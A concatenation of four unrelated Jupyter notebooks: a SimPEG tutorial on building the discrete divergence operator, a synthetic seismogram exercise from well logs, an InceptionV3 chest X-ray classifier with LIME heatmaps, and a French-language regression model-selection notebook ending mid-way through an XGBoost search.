print("There are {nFx} x-faces and {nFy} y-faces, so the length of the "
"face function, j, is {lenj}".format(
nFx=mesh2D.nFx,
nFy=mesh2D.nFy,
lenj=len(j_vec)
))
plt.colorbar(mesh2D.plotImage(j_vec, 'F', view='vec')[0])
```
### But first... what does the matrix look like?
Now, we know that we do not want to loop over each of the cells and instead want to work with matrix-vector products. In this case, each row of the divergence matrix should pick out the two relevant faces in the x-direction and two in the y-direction (4 total).
When we unwrap our face function, we unwrap using column major ordering, so all of the x-faces are adjacent to one another, while the y-faces are separated by the number of cells in the x-direction (see [mesh.ipynb](mesh.ipynb) for more details!).
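As a quick reminder, column-major ('F'-order) unwrapping stacks the columns of an array, which is why the x-faces end up adjacent in the vector:

```python
import numpy as np

jx = np.arange(6).reshape(2, 3)  # a tiny 2-by-3 grid of x-face values
print(jx)
print(jx.flatten(order='F'))     # columns stacked: [0 3 1 4 2 5]
```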
When we plot the divergence matrix, there will be 4 "diagonals",
- 2 that are due to the x-contribution
- 2 that are due to the y-contribution
Here, we define a small 2D mesh so that it is easier to see the matrix structure.
```
small_mesh2D = Mesh.TensorMesh([3,4])
print("Each y-face is {} entries apart".format(small_mesh2D.nCx))
print("and the total number of x-faces is {}".format(small_mesh2D.nFx))
print("So in the first row of the faceDiv, we have non-zero entries at \n{}".format(
small_mesh2D.faceDiv[0,:]))
```
Now, lets look at the matrix structure
```
fig, ax = plt.subplots(1,2, figsize=(12,4))
# plot the non-zero entries in the faceDiv
ax[0].spy(small_mesh2D.faceDiv, ms=2)
ax[0].set_xlabel('2D faceDiv')
small_mesh2D.plotGrid(ax=ax[1])
# Number the faces and plot. (We should really add this to SimPEG... pull request anyone!?)
xys = zip(
small_mesh2D.gridFx[:,0],
small_mesh2D.gridFx[:,1],
range(small_mesh2D.nFx)
)
for x,y,ii in xys:
ax[1].plot(x, y, 'r>')
ax[1].text(x+0.01, y-0.02, ii, color='r')
xys = zip(
small_mesh2D.gridFy[:,0],
small_mesh2D.gridFy[:,1],
range(small_mesh2D.nFy)
)
for x,y,ii in xys:
ax[1].plot(x, y, 'g^')
ax[1].text(x-0.02, y+0.02, ii+small_mesh2D.nFx, color='g')
ax[1].set_xlim((-0.1,1.1));
ax[1].set_ylim((-0.1,1.1));
```
How did we construct the matrix? - Kronecker products.
There is a handy identity that relates the vectorized face function to its matrix form (<a href = "https://en.wikipedia.org/wiki/Vectorization_(mathematics)#Compatibility_with_Kronecker_products">wikipedia link!</a>)
$$
\text{vec}(AUB^\top) = (B \otimes A) \text{vec}(U)
$$
For the x-contribution:
- A is our 1D differential operator ([-1, +1] on the diagonals)
- U is $j_x$ (the x-face function as a matrix)
- B is just an identity
so
$$
\text{Div}_x \text{vec}(j_x) = (I \otimes \text{Div}_{1D}) \text{vec}(j_x)
$$
For the y-contribution:
- A is just an identity!
- U is $j_y$ (the y-face function as a matrix)
- B is our 1D differential operator ([-1, +1] on the diagonals)
so
$$
\text{Div}_y \text{vec}(j_y) = (\text{Div}_{1D} \otimes I) \text{vec}(j_y)
$$
$$
\text{Div} \cdot j = \text{Div}_x \cdot j_x + \text{Div}_y \cdot j_y = [\text{Div}_x, \text{Div}_y] \cdot [j_x; j_y]
$$
And $j$ is just $[j_x; j_y]$, so we can horizontally stack $\text{Div}_x$, $\text{Div}_y$
$$
\text{Div} = [\text{Div}_x, \text{Div}_y]
$$
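Before trusting the identity, we can sanity-check it numerically with small dense matrices (the sizes here are arbitrary):

```python
import numpy as np

rng = np.random.default_rng(0)
A = rng.standard_normal((3, 3))  # stand-in for the 1D difference operator
U = rng.standard_normal((3, 4))  # stand-in for the face function as a matrix
B = rng.standard_normal((4, 4))  # stand-in for the identity (any matrix works)

vec = lambda M: M.flatten(order='F')  # column-major vectorization

lhs = vec(A @ U @ B.T)
rhs = np.kron(B, A) @ vec(U)
print(np.allclose(lhs, rhs))  # True
```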
You can check this out in the SimPEG docs by running **small_mesh2D.faceDiv??**
```
# small_mesh2D.faceDiv?? # check out the code!
```
Now that we have a discrete divergence, lets check out the divergence of the face function we defined earlier.
```
Div_j = mesh2D.faceDiv * j_vec
fig, ax = plt.subplots(1,2, figsize=(8,4))
plt.colorbar(mesh2D.plotImage(j_vec, 'F', view='vec', ax=ax[0])[0],ax=ax[0])
plt.colorbar(mesh2D.plotImage(Div_j, ax=ax[1])[0],ax=ax[1])
ax[0].set_title('j')
ax[1].set_title('Div j')
plt.tight_layout()
```
### Are we right??
Since we chose a simple function,
$$
\vec{j} = - \sin(2\pi x) \hat{x} - \sin(2\pi y) \hat{y}
$$
we know the continuous divergence...
$$
\nabla \cdot \vec{j} = -2\pi (\cos(2\pi x) + \cos(2\pi y))
$$
So lets plot it and take a look
```
# from earlier
# jx_fct = lambda x, y: -np.sin(2*np.pi*x)
# jy_fct = lambda x, y: -np.sin(2*np.pi*y)
sol = lambda x, y: -2*np.pi*(np.cos(2*np.pi*x)+np.cos(2*np.pi*y))
cont_div_j = sol(mesh2D.gridCC[:,0], mesh2D.gridCC[:,1])
Div_j = mesh2D.faceDiv * j_vec
fig, ax = plt.subplots(1,2, figsize=(8,4))
plt.colorbar(mesh2D.plotImage(Div_j, ax=ax[0])[0],ax=ax[0])
plt.colorbar(mesh2D.plotImage(cont_div_j, ax=ax[1])[0],ax=ax[1])
ax[0].set_title('Discrete Div j')
ax[1].set_title('Continuous Div j')
plt.tight_layout()
```
Those look similar :)
### Order Test
We can do better than just an eye-ball comparison - since we are using a staggered grid with centered differences, the discretization should be second-order ($\mathcal{O}(h^2)$). That is, each time we halve the cell size, the error in our approximation of the divergence should drop by a factor of four.
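To see that rate concretely, here is a quick check in pure numpy, using the 1D analogue of the sine flux above (this is a hand-rolled sketch, independent of SimPEG):

```python
import numpy as np

def div_error(n):
    """Max error of the staggered-grid divergence of j = -sin(2*pi*x) on [0, 1]."""
    h = 1.0 / n
    faces = np.linspace(0, 1, n + 1)          # face locations
    centers = 0.5 * (faces[:-1] + faces[1:])  # cell centers
    j = -np.sin(2 * np.pi * faces)            # flux sampled on faces
    div_num = np.diff(j) / h                  # centered difference per cell
    div_true = -2 * np.pi * np.cos(2 * np.pi * centers)
    return np.abs(div_num - div_true).max()

e1, e2 = div_error(20), div_error(40)
print(e1 / e2)  # close to 4: halving h quarters the error
```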
SimPEG has a number of testing functions for
[derivatives](http://docs.simpeg.xyz/content/api_core/api_Tests.html#SimPEG.Tests.checkDerivative)
and
[order of convergence](http://docs.simpeg.xyz/content/api_core/api_Tests.html#SimPEG.Tests.OrderTest)
to make our lives easier!
```
import unittest
from SimPEG.Tests import OrderTest
jx = lambda x, y: -np.sin(2*np.pi*x)
jy = lambda x, y: -np.sin(2*np.pi*y)
sol = lambda x, y: -2*np.pi*(np.cos(2*np.pi*x)+np.cos(2*np.pi*y))
class Testify(OrderTest):
meshDimension = 2
def getError(self):
j = np.r_[jx(self.M.gridFx[:,0], self.M.gridFx[:,1]),
jy(self.M.gridFy[:,0], self.M.gridFy[:,1])]
num = self.M.faceDiv * j # numeric answer
ans = sol(self.M.gridCC[:,0], self.M.gridCC[:,1]) # note M is a 2D mesh
return np.linalg.norm((num - ans), np.inf) # look at the infinity norm
# (as we refine the mesh, the number of cells
# changes, so need to be careful if using a 2-norm)
def test_order(self):
self.orderTest()
# This just runs the unittest:
suite = unittest.TestLoader().loadTestsFromTestCase( Testify )
unittest.TextTestRunner().run( suite );
```
Looks good - Second order convergence!
## Next up ...
In the [next notebook](weakformulation.ipynb), we will explore how to use the weak formulation to discretize the DC equations.
|
github_jupyter
|
# Synthetic seismogram
This notebook looks at the convolutional model of a seismic trace.
For a fuller example, see [Bianco, E (2004)](https://github.com/seg/tutorials-2014/blob/master/1406_Make_a_synthetic/how_to_make_synthetic.ipynb) in *The Leading Edge*.
First, the usual preliminaries.
```
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
```
## Load geophysical data
We'll use `welly` (which is built on `lasio`) to facilitate loading curves from an LAS file.
```
from welly import Well
w = Well.from_las('../data/L-30.las')
dt = w.data["DT"]
rhob = w.data["RHOB"]
dt
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Convert the logs to SI units</li>
</ul>
</div>
```
dt =
rhob =
```
Compute velocity and thus acoustic impedance.
```
from utils import vp_from_dt, impedance, rc_series
vp = vp_from_dt(dt)
ai = impedance(vp, rhob)
z = dt.basis
plt.figure(figsize=(16, 2))
plt.plot(z, ai, lw=0.5)
plt.show()
```
## Depth to time conversion
The logs are in depth, but the seismic is in travel time. So we need to convert the well data to time.
We don't know the seismic time, but we can model it from the DT curve: since DT is 'elapsed time', in microseconds per metre, we can just add up all these time intervals for 'total elapsed time'. Then we can use that to 'look up' the time of a given depth.
We use the step size to scale the DT values to 'seconds per step' (instead of µs/m).
```
scaled_dt = dt.step * np.nan_to_num(dt) / 1e6 # Convert to seconds per step
```
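On a toy DT array (values invented for illustration), the 'add up the intervals' idea looks like this:

```python
import numpy as np

step = 10.0                                                  # depth step in metres
dt_us_per_m = np.array([400.0, 380.0, 350.0, 330.0, 320.0])  # toy DT log, in µs/m

scaled = step * dt_us_per_m / 1e6  # one-way seconds elapsed over each depth step
twt = 2 * np.cumsum(scaled)        # cumulative two-way time at the base of each step
print(twt)
```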
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Do the arithmetic to find the timing of the top of the log.</li>
</ul>
</div>
```
dt.start, w.las.header['Well']['STRT']
kb = 0.3048 * w.las.header['Well']['KB'].value
gl = 0.3048 * w.las.header['Well']['GL'].value
start = dt.start
v_water = 1480
v_repl = 1800
water_layer = # Depth of water
repl_layer = # Thickness of replacement layer
water_twt = # TWT in water, using water_layer and v_water
repl_twt = # TWT in replacement layer, using repl_layer and v_repl
print("Water time: {:.3f} s\nRepl time: {:.3f} s".format(water_twt, repl_twt))
```
You should get
    Water time: 0.186 s
    Repl time: 0.233 s
Now finally we can compute the cumulative time elapsed on the DT log:
```
dt_time = water_twt + repl_twt + 2*np.cumsum(scaled_dt)
dt_time[-1]
```
And then use this to convert the logs to a time basis:
```
delt = 0.004 # Sample interval.
maxt = np.ceil(dt_time[-1]) # Max time that we need; just needs to be longer than the log.
# Make a regular time basis: the seismic time domain.
seis_time = np.arange(0, maxt, delt)
# Interpolate the AI log onto this basis.
ai_t = np.interp(seis_time, dt_time, ai)
# Let's do the depth 'log' too while we're at it.
z_t = np.interp(seis_time, dt_time, z)
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Make a time-conversion function to get time-converted logs from `delt`, `maxt`, `dt_time`, and a log.</li>
<li>- Make a function to get `dt_time` from `kb`, `gl`, `dt`, `v_water`, `v_repl`.</li>
<li>- Recompute `ai_t` by calling your new functions.</li>
<li>- Plot the DT log in time.</li>
</ul>
</div>
```
def time_convert(log, dt_time, delt=0.004, maxt=3.0):
"""
Converts log to the time domain, given dt_time, delt, and maxt.
dt_time is elapsed time regularly sampled in depth. log must
be sampled on the same depth basis.
"""
# Your code here!
return log_t
def compute_dt_time(dt, kb, gl, v_repl, v_water=1480):
"""
Compute DT time from the dt log and some other variables.
The DT log must be a welly curve object.
"""
# Your code here!
return dt_time
```
Now, at last, we can compute the reflection coefficients in time.
```
from utils import rc_vector
rc = rc_vector(ai_t)
rc[np.isnan(rc)] = 0
```
Plotting these is a bit more fiddly, because we would like to show them as a sequence of spikes, rather than as a continuous curve, and matplotlib's `axvline` method wants everything in terms of fractions of the plot's dimensions, not as values in the data space.
```
plt.figure(figsize=(16, 2))
pts, stems, base = plt.stem(seis_time[1:], rc)
plt.setp(pts, markersize=0)
plt.setp(stems, lw=0.5)
plt.setp(base, lw=0.75)
plt.show()
```
## Impulsive wavelet
Convolve with a wavelet.
```
from bruges.filters import ricker
f = 25
# Use a new name for the wavelet: `w` is already our Well object
wavelet, t = ricker(0.128, 0.004, f, return_t=True)
plt.plot(t, wavelet)
plt.show()
syn = np.convolve(rc, wavelet, mode='same')
plt.figure(figsize=(16,2))
plt.plot(seis_time[1:], syn)
plt.show()
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Try to plot the RC series with the synthetic.</li>
<li>- You'll need to zoom in a bit to see much, try using a slice of `[300:350]` on all x's and y's.</li>
</ul>
</div>
If the widgets don't show up, you might need to do this:
jupyter nbextension enable --py widgetsnbextension
If we are recording with dynamite or even an airgun, this might be an acceptable model of the seismic. But if we're using Vibroseis, things get more complicated. To get a flavour, try another wavelet in `bruges.filters`, or check out the notebooks:
- [Vibroseis data](../notebooks/Vibroseis_data.ipynb)
- [Wavelets and sweeps](../notebooks/Wavelets_and_sweeps.ipynb)
## Compare with the seismic
```
seismic = np.loadtxt('../data/Penobscot_xl1155.txt')
syn.shape
```
The synthetic is at trace number 77. We need to make a shifted version of the synthetic to overplot.
```
tr = 77
gain = 50
s = tr + gain*syn
```
And we can define semi-real-world coordinates of the seismic data:
```
extent = (0, 400, 4.0, 0)
plt.figure(figsize=(10,20))
plt.imshow(seismic.T, cmap='Greys', extent=extent, aspect='auto')
plt.plot(s, seis_time[1:])
plt.fill_betweenx(seis_time[1:], tr, s, where=syn>0, lw=0)
plt.xlim(0, 400)
plt.ylim(3.2, 0)
plt.show()
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>Load your tops data from `Reading data from files.ipynb` (using `from utils import tops` perhaps), or using the function you made in [`Practice functions`](Practice_functions.ipynb).</li>
<li>- Use the time-converted 'depth', `z_t`, to convert depths to time.</li>
<li>- Plot the tops on the seismic.</li>
</ul>
</div>
```
from utils import get_tops_from_file
tops = get_tops_from_file('../data/L-30_tops.txt')
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Make functions for the wavelet creation, synthetic generation, and synthetic plotting steps.</li>
<li>- Make a master function that takes the name of an LAS file, plus any other required info (such as `delt`), and returns a tuple of arrays: a time basis, and the synthetic amplitudes. You could make saving a plot optional.</li>
<li>- Copy this notebook and make an offset synthetic for `R-39.las`, which has a shear-wave DT.</li>
</ul>
</div>
<hr />
<div>
<img src="https://avatars1.githubusercontent.com/u/1692321?s=50"><p style="text-align:center">© Agile Geoscience 2016</p>
</div>
<a href="https://colab.research.google.com/github/Serbeld/RX-COVID-19/blob/master/Detection5C_NormNew_v2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
!pip install lime
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.applications import inception_v3
from tensorflow.keras.layers import Dense,Dropout,Flatten,Input,AveragePooling2D,BatchNormalization
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.utils import to_categorical
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import cv2
import os
import lime
from lime import lime_image
from skimage.segmentation import mark_boundaries
import pandas as pd
plt.rcParams["figure.figsize"] = (10,5)
#Loading the dataset
!pip install h5py
import h5py
from google.colab import drive,files
drive.mount('/content/drive')
hdf5_path = '/content/drive/My Drive/Dataset5C/Dataset5C.hdf5'
dataset = h5py.File(hdf5_path, "r")
import numpy as np
import matplotlib.pylab as plt
#train
train_img = dataset["train_img"]
xt = np.array(train_img)
yt = np.array(dataset["train_labels"])
#test
testX = np.array(dataset["test_img"])
testY = np.array(dataset["test_labels"])
#Validation
xval = np.array(dataset["val_img"])
yval = np.array(dataset["val_labels"])
print("Training Shape: "+ str(xt.shape))
print("Validation Shape: "+ str(xval.shape))
print("Testing Shape: "+ str(testX.shape))
#Categorical values or OneHot
import keras
num_classes = 5
yt = keras.utils.to_categorical(yt,num_classes)
testY = keras.utils.to_categorical(testY,num_classes)
yval = keras.utils.to_categorical(yval,num_classes)
#Image
num_image = 15
print()
print('Healthy: [1 0 0 0 0]')
print('Pneumonia & Covid-19: [0 1 0 0 0]')
print('Cardiomegaly: [0 0 1 0 0]')
print('Other respiratory disease: [0 0 0 1 0]')
print('Pleural Effusion: [0 0 0 0 1]')
print()
print("Output: "+ str(yt[num_image]))
imagen = train_img[num_image]
plt.imshow(imagen)
plt.show()
## global params
INIT_LR = 1e-5 # learning rate
EPOCHS = 10 # training epochs
BS = 4 # batch size
## build network
from tensorflow.keras.models import load_model
#Inputs
inputs = Input(shape=(512, 512, 3), name='images')
inputs2 = BatchNormalization()(inputs)
#Inception Model
output1 = inception_v3.InceptionV3(include_top=False,weights= "imagenet",
input_shape=(512, 512, 3),
classes = 5)(inputs2)
#AveragePooling2D
output = AveragePooling2D(pool_size=(2, 2), strides=None,
padding='valid',name='AvgPooling')(output1)
#Flattened
output = Flatten(name='Flatten')(output)
#Dropout
output = Dropout(0.2,name='Dropout')(output)
#ReLU layer
output = Dense(10, activation = 'relu',name='ReLU')(output)
#Dense layer
output = Dense(5, activation='softmax',name='softmax')(output)
# the actual model (that we will train)
model = Model(inputs=inputs, outputs=output)
print("[INFO] compiling model...")
opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
model.compile(loss="categorical_crossentropy", optimizer=opt,
metrics=["accuracy"])
model.summary()
from tensorflow.keras.callbacks import ModelCheckpoint
model_checkpoint = ModelCheckpoint(filepath="/content/drive/My Drive/Dataset5C/Model",
monitor='val_loss', save_best_only=True)
## train
print("[INFO] training head...")
H = model.fit({'images': xt},
{'softmax': yt},
batch_size = BS,
epochs = EPOCHS,
validation_data=(xval, yval),
callbacks=[model_checkpoint],
shuffle=True)
#Load the best model trained
model = load_model("/content/drive/My Drive/Dataset5C/Model")
## eval
print("[INFO] evaluating network...")
print()
print("Loss: "+ str(round(model.evaluate(testX,testY,verbose=0)[0],2))+ " Acc: "+ str(round(model.evaluate(testX,testY,verbose=1)[1],2)))
print()
predIdxs = model.predict(testX)
predIdxs = np.argmax(predIdxs, axis=1) # argmax for the predicted probability
#print(classification_report(testY.argmax(axis=1), predIdxs,target_names=lb.classes_))
cm = confusion_matrix(testY.argmax(axis=1), predIdxs)
total = sum(sum(cm))
#print(total) #60
acc = (cm[0, 0] + cm[1, 1] + cm[2, 2] + cm[3,3]+ cm[4,4]) / total
#sensitivity = cm[0, 0] / (cm[0, 0] + cm[0, 1])
#specificity = cm[1, 1] / (cm[1, 0] + cm[1, 1])
# show the confusion matrix, accuracy, sensitivity, and specificity
print(cm)
print("acc: {:.4f}".format(acc))
#print("sensitivity: {:.4f}".format(sensitivity))
#print("specificity: {:.4f}".format(specificity))
## explain
N = EPOCHS
plt.style.use("ggplot")
plt.figure(1)
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_accuracy"], label="val_acc")
plt.title("Precision of COVID-19 detection.")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
#plt.axis([0, EPOCHS, 0.3, 0.9])
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_cero_plot_Inception_2nd_time.png")
plt.show()
import cv2
plt.figure(2)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=5, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
plt.imshow((mask +imagen)/255)
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Normal"+str(ind)+".png")
plt.show()
plt.figure(3)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=5, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((50,50),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 1)
mask = cv2.blur(mask,(30,30))
plt.imshow((mask +imagen)/255)
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Light"+str(ind)+".png")
plt.show()
plt.figure(4)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=3, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((50,50),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 1)
mask = cv2.blur(mask,(30,30))
mask = np.array(mask, dtype=np.uint8)
mask = cv2.medianBlur(mask,5)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
mask = cv2.applyColorMap(mask, cv2.COLORMAP_HOT) #heatmap
end = cv2.addWeighted((imagen/255), 0.7, mask/255, 0.3, 0)
plt.imshow((end))
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Heat_map_purple"+str(ind)+".png")
plt.show()
plt.figure(4)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=2, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((30,30),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 2)
mask = cv2.blur(mask,(30,30))
mask = cv2.blur(mask,(30,30))
mask = np.array(mask, dtype=np.uint8)
mask = cv2.medianBlur(mask,5)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
mask2 = cv2.applyColorMap((mask), cv2.COLORMAP_JET) #heatmap
mask = cv2.blur(mask,(60,60))
mask = cv2.applyColorMap(mask, cv2.COLORMAP_HOT) #heatmap
mask = ((mask*1.1 + mask2*0.7)/255)*(3/2)
end = cv2.addWeighted(imagen/255, 0.8, mask2/255, 0.3, 0)
#end = cv2.addWeighted(end, 0.8, mask/255, 0.2, 0)
plt.imshow((end))
cv2.imwrite("/content/drive/My Drive/Maps/Heat_map"+str(ind)+".png",end*255)
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Heat_map"+str(ind)+".png")
plt.show()
plt.figure(5)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=1, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((30,30),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 2)
mask = cv2.blur(mask,(30,30))
mask = cv2.blur(mask,(30,30))
mask = np.array(mask, dtype=np.uint8)
mask = cv2.medianBlur(mask,5)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
mask2 = cv2.applyColorMap((mask), cv2.COLORMAP_JET) #heatmap
mask = cv2.blur(mask,(60,60))
mask = cv2.applyColorMap(mask, cv2.COLORMAP_HOT) #heatmap
mask = ((mask*1.1 + mask2*0.7)/255)*(3/2)
end = cv2.addWeighted(imagen/255, 0.8, mask2/255, 0.3, 0)
#end = cv2.addWeighted(end, 0.8, mask/255, 0.2, 0)
deep = np.reshape(end,newshape=(512,512,3),order='C')
CHANNEL1=deep[:,:,2]
CHANNEL2=deep[:,:,0]
deep[:,:,0] = CHANNEL1
#deep[:,:,2] = CHANNEL2
plt.imshow((deep))
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Heat_map_ma"+str(ind)+".png")
plt.show()
```
# Model selection
Now that we have engineered features through domain knowledge and EDA, and selected them with Boruta, we can move on to choosing the model(s) best suited to our dataset.
The EDA raises a few questions on this front, but the best approach is still to test a variety of models with a few combinations of their hyperparameters.
A word on hyperparameters: for the learning rate or the regularization strength, adding 0.1 to 0.01 has a large effect on the model's behaviour, whereas adding 0.1 to 10 has practically no effect. So, for the learning rate, we should favour a logarithmic distribution over the parameter.
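For example, `scipy.stats.loguniform` draws samples uniformly on a log scale and can be passed directly to `RandomizedSearchCV`'s `param_distributions` (the bounds below are illustrative):

```python
import numpy as np
from scipy.stats import loguniform

# Learning-rate candidates between 1e-4 and 1e-1, uniform in log space
dist = loguniform(1e-4, 1e-1)
samples = dist.rvs(size=1000, random_state=42)

# Each decade receives roughly a third of the draws
print(np.mean(samples < 1e-3), np.mean(samples > 1e-2))
```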
```
from model_selector.run_regressors import run_linear_models, run_svm_models, run_neighbor_models, run_gaussian_models, run_nn_models, run_tree_models, run_ensemble_models
from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone
from sklearn.model_selection import KFold, cross_val_score, train_test_split
from sklearn.metrics import mean_squared_error
import pickle
import xgboost as xgb
import seaborn as sns
from typing import List
import scipy.stats as stats
import pandas as pd
import sqlite3 as sql
import matplotlib.pyplot as plt
%matplotlib inline
sns.set_theme(style="darkgrid")
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
train = pd.read_csv('../data/train.csv', index_col='date')
test = pd.read_csv('../data/test.csv', index_col='date')
y_train = train.reel
X_train = train.drop(['reel'], axis=1)
y_test = test.reel
X_test = test.drop(['reel'], axis=1)
X_test.head()
```
## 1. Linear models
```
# run_linear_models(X_train, y_train, small = True, normalize_x = False)
```

## 2. Support vector machine (SVM) models
From the Scikit-learn documentation:
The fit time complexity of SVR is more than quadratic with the number of samples, which makes it hard to scale to datasets with more than 10,000 samples. For large datasets, consider using LinearSVR or SGDRegressor instead, possibly after a Nystroem transformer.
Here, given the size of our dataset, we use the LinearSVR model only.
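As a sketch of that scikit-learn advice (on a synthetic dataset, since this is only an illustration, not the pipeline used in this project):

```python
from sklearn.datasets import make_regression
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.kernel_approximation import Nystroem
from sklearn.linear_model import SGDRegressor

# Synthetic stand-in for a dataset too large for kernel SVR
X, y = make_regression(n_samples=20000, n_features=10, noise=0.5, random_state=42)

# Approximate an RBF kernel with Nystroem, then fit a fast linear model on top
model = make_pipeline(
    StandardScaler(),
    Nystroem(kernel='rbf', n_components=100, random_state=42),
    SGDRegressor(max_iter=1000, tol=1e-3, random_state=42),
)
model.fit(X, y)
r2 = model.score(X, y)
print(round(r2, 3))
```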
```
# run_svm_models(X_train, y_train, small = True, normalize_x = False)
```

LinearSVR brings no improvement over LassoLars.
## 3. Distance-based models
```
# run_neighbor_models(X_train, y_train, normalize_x = False)
```

On this dataset, KNN performs relatively poorly compared to the models tested previously.
## 4. Gaussian models
```
# run_gaussian_models(X_train, y_train, small = True, normalize_x = False)
```

Just like SVM earlier, this model requires a large amount of RAM, because its Scikit-learn implementation computes a covariance matrix over the entire train set. Given our large dataset, that is not feasible here. As with SVM, we could probably try a batch-training approach.
## 5. Neural networks
```
# run_nn_models(X_train, y_train, small = True, normalize_x = False)
```

MLPRegressor achieves solid results, in the same vein as the linear models.
## 6. Decision-tree models
```
# run_tree_models(X_train, y_train, small = True, normalize_x = False)
```

Somewhat surprisingly, a simple decision tree achieves the best score so far. A good next step is to continue in the direction of more sophisticated tree-based models.
## 7. Ensemble models (bagging)
```
run_ensemble_models(X_train, y_train, small = True, normalize_x = False)
```

<br>
This run confirms the trend: tree-based models appear to be good candidates on this dataset. Let's now look at the boosting technique.
## 8. Ensemble models (boosting): XGBoost and LGBM
XGBoost and LGBM are not yet implemented in my model-selection package, so we run a manual randomized search.
```
from xgboost import XGBRegressor
from sklearn.model_selection import RandomizedSearchCV
from sklearn.model_selection import TimeSeriesSplit, cross_val_score
import time
# n_estimators must be tuned later,
# because parameter draws sampled with higher n_estimators
# would get an unfair advantage (default=100)
params = {
'n_estimators': [100, 150, 250, 500],
'min_child_weight': [2, 4, 6],
'gamma': [i/10.0 for i in range(2, 6)],
'max_depth': [3, 5, 8],
'learning_rate': [0.01, 0.05, 0.1, 0.2]
}
reg = XGBRegressor(seed=42)
n_iter_search = 100
cv_ts = TimeSeriesSplit(n_splits=3)
random_search = RandomizedSearchCV(reg, param_distributions=params, verbose = 2,
n_iter=n_iter_search, cv=cv_ts, scoring='neg_mean_squared_error', random_state=42)
start = time.time()
random_search.fit(X_train, y_train)
